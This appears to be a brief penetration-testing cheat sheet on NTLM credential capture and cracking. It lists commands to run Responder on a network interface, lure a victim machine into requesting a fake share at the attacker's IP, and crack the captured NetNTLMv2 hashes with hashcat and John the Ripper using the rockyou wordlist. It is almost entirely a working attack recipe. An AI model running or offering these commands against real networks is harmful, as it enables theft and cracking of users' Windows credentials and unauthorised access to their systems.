Last updated 9 months ago
sudo responder -I eth0
Note: You have to request for an non existent share in the victim machine
\\<Attacker IP>\FakeShare
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
john --wordlist=<wordlist.txt> hash.txt